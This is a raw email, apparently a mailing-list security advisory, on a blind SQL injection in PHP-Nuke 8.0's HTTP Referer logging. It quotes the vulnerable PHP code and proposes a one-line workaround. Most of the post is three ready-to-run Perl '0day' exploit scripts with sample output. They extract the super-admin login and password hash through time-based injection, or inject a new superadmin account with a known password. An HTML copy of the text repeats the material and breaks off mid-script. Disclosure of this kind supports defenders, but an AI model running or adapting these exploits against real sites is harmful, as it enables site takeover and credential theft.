------=_Part_70549_10889112.1171994685834
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

Hello, it is my new advisory:

Problem:Blind sql injection attack in INSERT syntax
Product:PHP-nuke <=8.0
Web page:http://phpnuke.org/

Credit:Maciej `krasza` Kukla
@mail:krasza@gmail.com
homepage:www.krasza.int.pl

1.Description

(...)PHP-Nuke 8.0 Final version. This version includes a new anti-flood
system, several cosmetic changes, a new web based installer, improvements on
advertising system, downloads and web links modules, Forums and all BBtoNuke
modules are now separated from the core system, improved the News module and
many bugs fixes. Additionaly PHP-Nuke version 7.9 has been released for free
to the public on the downloads section.(...)

Purchase PHP-Nuke 8.0 cast $12.

2.Blind sql injection attack in INSERT syntax

Lately I detected many sql injection attack in INSERT SYNTAX,where query
looks like "INSERT into `nuke_referer` values(1,'$var')", $var is not
filtered.It is possible to add new administrator(it is abuse of course),
when the script is working on every base(PostgreSQL,mssql...) except MySQL
base.
It is working thanks to "breaking queries"(INSERT ....; INSERT...).When
script is working on MySQL base(version 4.0.24 or later) and we can review
contents `ratingtable` using visiting php script, then it is allowed add
value(example admin's hash) from other table to `nuke_referer` as record. It
is working thanks to subquery(
http://dev.mysql.com/doc/refman/5.0/en/subqueries.html), example "INSERT
into.... values(1,'cos'),(1,(SELECT pwd FROM `nuke_authors` WHERE
`radminsuper`=1))/*')"
Unfortunetly we can't usually see content `nuke_referer`, because we use
'including attack method'('Blind sql injection' with 'sql injection in
INSERT syntax').It will be effective thanks to use time's
function-benchmark() and sleep().Function benchmark() is more universal than
sleep(), because function is available from mysql version 4.0.24.When we
know it, we can prepare exploiting query, example:
"INSERT INTO nuke_referer VALUES (NULL, '
http://www.krasza.int.pl'),(-1,(SELECT IF((ASCII(SUBSTRING(`pwd`,1,1))=97) &
1, benchmark(50000000,CHAR(0)),0) FROM `nuke_authors` WHERE
`radminsuper`=1))/*')"
If script will be executing long, that means the first liter of
administrator's hash is 'a'.This method was discoroved by me last weekend.
Bug is found in index.php:
---index.php:42---
if ($httpref == 1) { //default $httpref=1, on 95% sites
    if (isset($_SERVER['HTTP_REFERER'])) {
    $referer = $_SERVER['HTTP_REFERER'];
    $referer = check_html($referer, "nohtml");
    }
    if (!empty($referer) && !stripos_clone($referer, "unknown") &&
!stripos_clone($referer, "bookmark") && !stripos_clone($referer,
$_SERVER['HTTP_HOST'])) {
    $result = $db->sql_query("INSERT INTO ".$prefix."_referer VALUES (NULL,
'".$referer."')");//bug is here!!
    }
    $numrows = $db->sql_numrows($db->sql_query("SELECT * FROM
".$prefix."_referer"));
    if($numrows>=$httprefmax) {
        $result2 = $db->sql_query("DELETE FROM ".$prefix."_referer");
    }
}
---index.php:54---

The same bug you can find in modules/News/categories.php:
---modules/News/categories.php:96---
        if ($httpref==1) {
                $referer = $_SERVER['HTTP_REFERER'];
                if ($referer=="" OR ereg("unknown", $referer) OR
eregi($nukeurl,$referer)) {
                } else {
                        $db->sql_query("insert into ".$prefix."_referer
values (NULL, '$referer')");//bug is here!!
                }
                $numrows = $db->sql_numrows($db->sql_query("select * from
".$prefix."_referer"));
                if($numrows==$httprefmax) {
                        $db->sql_query("delete from ".$prefix."_referer");
                }
        }
---modules/News/categories.php:106---

3.Exploits(also all available in attachments)

Exploit for mysql >= 4.0.24, when 'HTTP Referers' block is off:
---
#!/usr/bin/perl
#0day exploit for PHP-nuke <=8.0 Final
#Blind sql injection attack in INSERT syntax
#version for mysql >= 4.0.24, using 'brute force'
#Coded by:Maciej `krasza` Kukla[krasza@gmail.com]
#Screenshot:
#0day exploit for PHP-nuke <=8.0 Final
#Sql injection attack in INSERT syntax
#Coded by:Maciej `krasza` Kukla[krasza@gmail.com]
#
#[+]Time normal query: 2 seconds
#[+]Length user's record: 5
#[+]Length password's record: 32
#[+]Login:
#admin
#[+]Password:
#b481ab90de84a345c665f1e4ef3c2
#[+]Super admin:
#admin:b481ab90de84a345c66585e1f4cf16e4
use strict;
use warnings;
use LWP;
my $offset=4;#It is the most important variable!!
my $adres=shift or help();
my $ua = LWP::UserAgent->new;
my $zadanie = HTTP::Request->new(GET => $adres);
my
($respone,$komenda,$poczatek,$koniec,$czas_nor,$i,$j,$dlugosc_user,$user,$hash,$referer,$czy_dziala,$znak);
banner();
$czas_nor=polacz("http://www.krasza.int.pl");
print "[+]Time normal query: $czas_nor seconds\n";
$dlugosc_user=ustal_dlugosc("aid",8);
print "[+]Length user's record: $dlugosc_user\n";
print "[+]Length password's record: 32\n";
print "[+]Login:\n";
$user=brute_force_aid($dlugosc_user);
print "[+]Password:\n";
$hash=brute_force_pass(32);
print "[+]Super admin:\n";
print "$user:$hash\n";
##
sub brute_force_pass{
        my ($dlugosc)=@_;
        my ($i,$j,$referer,$wynik,$dolny_zakres);
        for($i=1;$i<=$dlugosc;$i++){
                for($j=48;$j<=122;$j++){

$referer="http://www.krasza.int.pl'),(-1,(SELECTIF((ASCII(SUBSTRING(`pwd`,".$i.",1))=".$j.")
& 1,
benchmark(50000000,CHAR(0)),0) FROM `nuke_authors` WHERE
`radminsuper`=1))/*";
                $czy_dziala=czy_dziala($referer);
                        if($czy_dziala==1){
                                        $znak=chr($j);
                                        print "$znak";
                                        $wynik.=$znak;
                                if($i<$dlugosc){
                                        $i+=1;
                                        $j=47;
                                }else{
                                        last;
                                }
                        }
                        #przeskok-optymalizacja;]
                        if($j==57){
                                $j=96;
                        }
                }
        }
                print "\n";
                return $wynik;
}
sub brute_force_aid{
        my ($dlugosc)=@_;
        my ($i,$j,$referer,$wynik,$dolny_zakres);
        for($i=1;$i<=$dlugosc;$i++){
                for($j=48;$j<=122;$j++){

$referer="http://www.krasza.int.pl'),(-1,(SELECTIF((ASCII(SUBSTRING(`aid`,".$i.",1))=".$j.")
& 1,
benchmark(50000000,CHAR(0)),0) FROM `nuke_authors` WHERE
`radminsuper`=1))/*";
                $czy_dziala=czy_dziala($referer);
                        if($czy_dziala==1){
                                        $znak=chr($j);
                                        print "$znak";
                                        $wynik.=$znak;
                                if($i<$dlugosc){
                                        $i+=1;
                                        $j=47;
                                }else{
                                        last;
                                }
                        }
                        if($j==57){
                                $j=64;
                        }
                        if($j==90){
                                $j=96;
                        }
                }
        }
                print "\n";
                return $wynik;
}
sub ustal_dlugosc{
        my ($pole,$len)=@_;
        my ($referer,$narazie_dziala_liczba,$nie_dziala_liczba);
        $narazie_dziala_liczba=0;
        $nie_dziala_liczba=65;
        #for($len=1;$len<64;$len++){
        while($len<=64){
                if($narazie_dziala_liczba==$len ||
$nie_dziala_liczba<=$len){
                        return $narazie_dziala_liczba;
                }

$referer="http://www.krasza.int.pl'),(-1,(SELECTIF((LENGTH(`".$pole."`)>".$len.")
& 1, benchmark(50000000,CHAR(0)),0) FROM
`nuke_authors` WHERE `radminsuper`=1))/*";
                $czy_dziala=czy_dziala($referer);
                if($czy_dziala==1){
                        $narazie_dziala_liczba=$len+1;
                        $len+=2;
                }else{
                        $nie_dziala_liczba=$len+1;
                        $len-=1;
                }
        }
        print "[-]Exploit Failed\n";
        exit;
}
sub czy_dziala{
        my ($refik)=@_;
        my $czas_zapytania;
        $czas_zapytania=polacz($refik);
        if($czas_zapytania>$czas_nor+$offset){
                return 1;
        }else{
                return 0;
        }
}
sub polacz{
        my ($referrer)=@_;
        my ($czas,$czas_poczatek,$czas_koniec);
        $zadanie->referer($referrer);
        $czas_poczatek=time();
        $respone=$ua->request($zadanie);
        $respone->is_success or die "$adres : ",$respone->message,"\n";
        $czas_koniec=time();
        $czas=$czas_koniec-$czas_poczatek;
        return $czas;
}
sub banner{
        print "0day exploit for PHP-nuke <=8.0 Final\n";
        print "Blind sql injection attack in INSERT syntax\n";
        print "version mysql >= 4.0.24, using 'brute force'\n";
        print "Coded by:Maciej `krasza` Kukla[krasza\@gmail.com]\n\n";
}
sub help{
        print "0day exploit for PHP-nuke <=8.0 Final\n";
        print "Blind sql injection attack in INSERT syntax\n";
        print "version mysql >= 4.0.24, using 'brute force'\n";
        print "Coded by:Maciej `krasza` Kukla[krasza\@gmail.com]\n";
        print "Use:\n";
        print "\tperl exploit.pl [url]\n";
        print "\t[url]-vicitim webpage with index.php\n";
        print "Example:\n";
        print "\tperl bruteforce.pl http://phpnuke.org/index.php\n";
        exit(0);
}
---

Exploit for mysql >= 4.0.24, when block 'HTTP Referers' is on:

---
#!/usr/bin/perl
#0day exploit for PHP-nuke <=8.0 Final
#Sql injection attack in INSERT syntax
#version, when 'HTTP Referers' block is on
#Coded by:Maciej `krasza` Kukla[krasza@gmail.com]
#Screenshot:
#0day exploit for PHP-nuke <=8.0 Final
#Sql injection attack in INSERT syntax
#version, when 'HTTP Referers' block is on
#Coded by:Maciej `krasza` Kukla[krasza@gmail.com]
#
#[+]You can see login and hash on web page in 'HTTP referers' block
#[+]Exploit successed
use strict;
use warnings;
use LWP;
my $adres=shift or help();
my $ua = LWP::UserAgent->new;
my $zadanie = HTTP::Request->new(GET => $adres);
my ($respone,$referer);
banner();
        $referer="http://www.krasza.int.pl'),(NULL,(SELECT `pwd` FROM
`nuke_authors` WHERE `radminsuper`=1))/*";
        $zadanie->referer($referer);
        $respone=$ua->request($zadanie);
        $respone->is_success or die "$adres : ",$respone->message,"\n";
        $referer="http://www.krasza.int.pl'),(NULL,(SELECT `aid` FROM
`nuke_authors` WHERE `radminsuper`=1))/*";
        $zadanie->referer($referer);
        $respone=$ua->request($zadanie);
        $respone->is_success or die "$adres : ",$respone->message,"\n";
        print "[+]You can see login and hash on web page in 'HTTP referers'
block\n";
        print "[+]Exploit successed\n";
sub banner{
        print "0day exploit for PHP-nuke <=8.0 Final\n";
        print "Sql injection attack in INSERT syntax\n";
        print "version, when 'HTTP Referers' block is on\n";
        print "Coded by:Maciej `krasza` Kukla[krasza\@gmail.com]\n\n";
}
sub help{
        print "0day exploit for PHP-nuke <=8.0 Final\n";
        print "Sql injection attack in INSERT syntax\n";
        print "version, when 'HTTP Referers' block is on\n";
        print "Coded by:Maciej `krasza` Kukla[krasza\@gmail.com]\n";
        print "Use:\n";
        print "\tperl exploit.pl [url]\n";
        print "\t[url]-vicitim webpage with index.php\n";
        print "Example:\n";
        print "\tperl exploit.pl http://phpnuke.org/index.php\n";
        exit(0);
}
---

Exploit for PostgreSQL,mssql:

---
#!/usr/bin/perl
#0day exploit for PHP-nuke <=8.0 Final
#Sql injection attack in INSERT syntax
#version for every base(PostgreSQL,mssql...) except MySQL base
#Coded by:Maciej `krasza` Kukla[krasza@gmail.com]
#Screenshot:
#0day exploit for PHP-nuke <=8.0 Final
#Sql injection attack in INSERT syntax
#version for every base(PostgreSQL,mssql...) except MySQL base
#Coded by:Maciej `krasza` Kukla[krasza@gmail.com]
#
#[+]I registered new superadmin
#[+]You can login at http://blackshell.pl/~krasza/nuke/html/index.php
#[+]Login:krasza
#[+]Password:krasza
#[+]Exploit successed
use strict;
use warnings;
use LWP;
my $adres=shift or help();
my $ua = LWP::UserAgent->new;
my $zadanie = HTTP::Request->new(GET => $adres);
my ($respone,$referer);
banner();
        $referer="http://www.krasza.int.pl');INSERT INTO `nuke_authors`
VALUES ('krasza', 'God', 'http://www.krasza.int.pl', 'krasza\@gmail.com',
'61af1f6e572d7fe3a72f54a6ac53830e', '0', '1', '";
        $zadanie->referer($referer);
        $respone=$ua->request($zadanie);
        $respone->is_success or die "$adres : ",$respone->message,"\n";
        print "[+]I registered new superadmin\n";
        print "[+]You can login at $adres \n";
        print "[+]Login:krasza\n";
        print "[+]Password:krasza\n";
        print "[+]Exploit successed\n";
sub banner{
        print "0day exploit for PHP-nuke <=8.0 Final\n";
        print "Sql injection attack in INSERT syntax\n";
        print "version for every base(PostgreSQL,mssql...) except MySQL
base\n";
        print "Coded by:Maciej `krasza` Kukla[krasza\@gmail.com]\n\n";
}
sub help{
        print "0day exploit for PHP-nuke <=8.0 Final\n";
        print "Sql injection attack in INSERT syntax\n";
        print "version for every base(PostgreSQL,mssql...) except MySQL
base\n";
        print "Coded by:Maciej `krasza` Kukla[krasza\@gmail.com]\n";
        print "Use:\n";
        print "\tperl exploit.pl [url]\n";
        print "\t[url]-vicitim webpage with index.php\n";
        print "Example:\n";
        print "\tperl exploit.pl http://phpnuke.org/index.php\n";
        exit(0);
}
---


4.Fix
Set variable $httpref=0 until php-nuke company  will publish oficial fix

Maciej `krasza` Kukla
krasza@gmail.com
www.krasza.int.pl

http://www.krewniacy.pl


-- 
Best regards, Maciej `krasza` Kukla

------=_Part_70549_10889112.1171994685834
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline

Hello, it is my new advisory:<br><br clear=3D"all">Problem:Blind sql inject=
ion attack in INSERT syntax<br>Product:PHP-nuke &lt;=3D8.0<br>Web page:<a h=
ref=3D"http://phpnuke.org/">http://phpnuke.org/</a><br><br>Credit:Maciej `k=
rasza` Kukla
<br>@<a href=3D"mailto:mail:krasza@gmail.com">mail:krasza@gmail.com</a><br>=
homepage:<a href=3D"http://www.krasza.int.pl">www.krasza.int.pl</a><br><br>=
1.Description<br><br>(...)PHP-Nuke 8.0 Final version. This version includes=
 a new anti-flood system, several cosmetic changes, a new web based install=
er, improvements on advertising system, downloads and web links modules, Fo=
rums and all BBtoNuke modules are now separated from the core system, impro=
ved the News module and many bugs fixes. Additionaly PHP-Nuke version=20
7.9 has been released for free to the public on the downloads section.(...)=
<br><br>Purchase PHP-Nuke 8.0 cast $12.<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&n=
bsp; <br>2.Blind sql injection attack in INSERT syntax<br>&nbsp;&nbsp;&nbsp=
;&nbsp;&nbsp;&nbsp;&nbsp; <br>Lately I detected many sql injection attack i=
n INSERT SYNTAX,where query looks like &quot;INSERT into `nuke_referer` val=
ues(1,&#39;$var&#39;)&quot;, $var is not=20
filtered.It is possible to add new administrator(it is abuse of course), wh=
en the script is working on every base(PostgreSQL,mssql...) except MySQL ba=
se.<br>It is working thanks to &quot;breaking queries&quot;(INSERT ....; IN=
SERT...).When script is working on MySQL base(version=20
4.0.24 or later) and we can review contents `ratingtable` using visiting ph=
p script, then it is allowed add value(example admin&#39;s hash) from other=
 table to `nuke_referer` as record. It is working thanks to subquery(<a hre=
f=3D"http://dev.mysql.com/doc/refman/5.0/en/subqueries.html">
http://dev.mysql.com/doc/refman/5.0/en/subqueries.html</a>), example &quot;=
INSERT into.... values(1,&#39;cos&#39;),(1,(SELECT pwd FROM `nuke_authors` =
WHERE `radminsuper`=3D1))/*&#39;)&quot;<br>Unfortunetly we can&#39;t usuall=
y see content `nuke_referer`, because we use &#39;including attack method&#=
39;(&#39;Blind sql injection&#39; with &#39;sql injection in INSERT syntax&=
#39;).It will be effective thanks to use time&#39;s function-benchmark() an=
d sleep().Function benchmark() is more universal than sleep(), because func=
tion is available from mysql version=20
4.0.24.When we know it, we can prepare exploiting query, example: <br>&quot=
;INSERT INTO nuke_referer VALUES (NULL, &#39;<a href=3D"http://www.krasza.i=
nt.pl&#39;),(-1,(SELECT">http://www.krasza.int.pl&#39;),(-1,(SELECT</a> IF(=
(ASCII(SUBSTRING(`pwd`,1,1))=3D97) &amp; 1, benchmark(50000000,CHAR(0)),0) =
FROM `nuke_authors` WHERE `radminsuper`=3D1))/*&#39;)&quot;
<br>If script will be executing long, that means the first liter of adminis=
trator&#39;s hash is &#39;a&#39;.This method was discoroved by me last week=
end.<br>Bug is found in index.php:<br>---index.php:42---<br>if ($httpref =
=3D=3D 1) { //default $httpref=3D1, on 95% sites
<br>&nbsp;&nbsp;&nbsp; if (isset($_SERVER[&#39;HTTP_REFERER&#39;])) {<br>&n=
bsp;&nbsp;&nbsp; $referer =3D $_SERVER[&#39;HTTP_REFERER&#39;];<br>&nbsp;&n=
bsp;&nbsp; $referer =3D check_html($referer, &quot;nohtml&quot;);<br>&nbsp;=
&nbsp;&nbsp; }<br>&nbsp;&nbsp;&nbsp; if (!empty($referer) &amp;&amp; !strip=
os_clone($referer, &quot;unknown&quot;) &amp;&amp; !stripos_clone($referer,=
 &quot;bookmark&quot;) &amp;&amp; !stripos_clone($referer, $_SERVER[&#39;HT=
TP_HOST&#39;])) {
<br>&nbsp;&nbsp;&nbsp; $result =3D $db-&gt;sql_query(&quot;INSERT INTO &quo=
t;.$prefix.&quot;_referer VALUES (NULL, &#39;&quot;.$referer.&quot;&#39;)&q=
uot;);//bug is here!!<br>&nbsp;&nbsp;&nbsp; }<br>&nbsp;&nbsp;&nbsp; $numrow=
s =3D $db-&gt;sql_numrows($db-&gt;sql_query(&quot;SELECT * FROM &quot;.$pre=
fix.&quot;_referer&quot;));
<br>&nbsp;&nbsp;&nbsp; if($numrows&gt;=3D$httprefmax) {<br>&nbsp;&nbsp;&nbs=
p;&nbsp;&nbsp;&nbsp;&nbsp; $result2 =3D $db-&gt;sql_query(&quot;DELETE FROM=
 &quot;.$prefix.&quot;_referer&quot;);<br>&nbsp;&nbsp;&nbsp; }<br>}<br>---i=
ndex.php:54---<br><br>The same bug you can find in modules/News/categories.=
php:
<br>---modules/News/categories.php:96---<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&=
nbsp;&nbsp; if ($httpref=3D=3D1) {<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&=
nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $referer =3D $_SERVER=
[&#39;HTTP_REFERER&#39;];<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbs=
p;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; if ($referer=3D=3D&quot;&quot;=
 OR ereg(&quot;unknown&quot;, $referer) OR eregi($nukeurl,$referer)) {
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp=
;&nbsp;&nbsp;&nbsp; } else {<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&=
nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbs=
p;&nbsp;&nbsp;&nbsp; $db-&gt;sql_query(&quot;insert into &quot;.$prefix.&qu=
ot;_referer values (NULL, &#39;$referer&#39;)&quot;);//bug is here!!<br>&nb=
sp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=
&nbsp;&nbsp; }<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb=
sp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $numrows =3D $db-&gt;sql_numrows($db-&gt;=
sql_query(&quot;select * from &quot;.$prefix.&quot;_referer&quot;));
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp=
;&nbsp;&nbsp;&nbsp; if($numrows=3D=3D$httprefmax) {<br>&nbsp;&nbsp;&nbsp;&n=
bsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp=
;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $db-&gt;sql_query(&quot;delete =
from &quot;.$prefix.&quot;_referer&quot;);<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp=
;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; }<br>&nbsp;&n=
bsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; }<br>---modules/News/categories.php:106-=
--
<br><br>3.Exploits(also all available in attachments)<br><br>Exploit for my=
sql &gt;=3D 4.0.24, when &#39;HTTP Referers&#39; block is off:<br>---<br>#!=
/usr/bin/perl<br>#0day exploit for PHP-nuke &lt;=3D8.0 Final<br>#Blind sql =
injection attack in INSERT syntax
<br>#version for mysql &gt;=3D 4.0.24, using &#39;brute force&#39;<br>#Code=
d by:Maciej `krasza` Kukla[<a href=3D"mailto:krasza@gmail.com">krasza@gmail=
.com</a>]<br>#Screenshot:<br>#0day exploit for PHP-nuke &lt;=3D8.0 Final<br=
>#Sql injection attack in INSERT syntax
<br>#Coded by:Maciej `krasza` Kukla[<a href=3D"mailto:krasza@gmail.com">kra=
sza@gmail.com</a>]<br>#<br>#[+]Time normal query: 2 seconds<br>#[+]Length u=
ser&#39;s record: 5<br>#[+]Length password&#39;s record: 32<br>#[+]Login:
<br>#admin<br>#[+]Password:<br>#b481ab90de84a345c665f1e4ef3c2<br>#[+]Super =
admin:<br>#admin:b481ab90de84a345c66585e1f4cf16e4<br>use strict;<br>use war=
nings;<br>use LWP;<br>my $offset=3D4;#It is the most important variable!!
<br>my $adres=3Dshift or help();<br>my $ua =3D LWP::UserAgent-&gt;new;<br>m=
y $zadanie =3D HTTP::Request-&gt;new(GET =3D&gt; $adres);<br>my ($respone,$=
komenda,$poczatek,$koniec,$czas_nor,$i,$j,$dlugosc_user,$user,$hash,$refere=
r,$czy_dziala,$znak);
<br>banner();<br>$czas_nor=3Dpolacz(&quot;<a href=3D"http://www.krasza.int.=
pl">http://www.krasza.int.pl</a>&quot;);<br>print &quot;[+]Time normal quer=
y: $czas_nor seconds\n&quot;;<br>$dlugosc_user=3Dustal_dlugosc(&quot;aid&qu=
ot;,8);
<br>print &quot;[+]Length user&#39;s record: $dlugosc_user\n&quot;;<br>prin=
t &quot;[+]Length password&#39;s record: 32\n&quot;;<br>print &quot;[+]Logi=
n:\n&quot;;<br>$user=3Dbrute_force_aid($dlugosc_user);<br>print &quot;[+]Pa=
ssword:\n&quot;;
<br>$hash=3Dbrute_force_pass(32);<br>print &quot;[+]Super admin:\n&quot;;<b=
r>print &quot;$user:$hash\n&quot;;<br>##<br>sub brute_force_pass{<br>&nbsp;=
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; my ($dlugosc)=3D@_;<br>&nbsp;&nbsp;&nb=
sp;&nbsp;&nbsp;&nbsp;&nbsp; my ($i,$j,$referer,$wynik,$dolny_zakres);<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; for($i=3D1;$i&lt;=3D$dlugosc;$i+=
+){<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&n=
bsp;&nbsp;&nbsp;&nbsp; for($j=3D48;$j&lt;=3D122;$j++){<br>&nbsp;&nbsp;&nbsp=
;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $=
referer=3D&quot;<a href=3D"http://www.krasza.int.pl&#39;),(-1,(SELECT">http=
://www.krasza.int.pl&#39;),(-1,(SELECT</a> IF((ASCII(SUBSTRING(`pwd`,&quot;=
.$i.&quot;,1))=3D&quot;.$j.&quot;) &amp; 1, benchmark(50000000,CHAR(0)),0) =
FROM `nuke_authors` WHERE `radminsuper`=3D1))/*&quot;;
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp=
;&nbsp;&nbsp;&nbsp; $czy_dziala=3Dczy_dziala($referer);<br>&nbsp;&nbsp;&nbs=
p;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&=
nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; if($czy_dziala=3D=3D1){<br>=
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb=
sp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb=
sp;&nbsp; $znak=3Dchr($j);<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb=
sp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb=
sp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; print &quot;$znak&quot;;
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp=
;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&n=
bsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp=
;&nbsp;&nbsp; $wynik.=3D$znak;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp=
;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&n=
bsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; if($=
i&lt;$dlugosc){<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&n=
bsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp=
;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&n=
bsp;&nbsp;&nbsp;&nbsp;&nbsp; $i+=3D1;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbs=
p;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&=
nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbs=
p;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $j=3D47;<br>&nbsp;&nbsp;=
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb=
sp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=
&nbsp;&nbsp;&nbsp;&nbsp; }else{
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp=
;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&n=
bsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp=
;&nbsp;&nbsp; last;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbs=
p;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&=
nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; }<br>&nbsp;&nbs=
p;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&=
nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; }<br>&nbsp;&nbsp;&nbs=
p;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&=
nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; #przeskok-optymalizacja;]<b=
r>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&=
nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; if($j=3D=
=3D57){<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbs=
p;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&=
nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $j=3D96;
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp=
;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; }<br>&n=
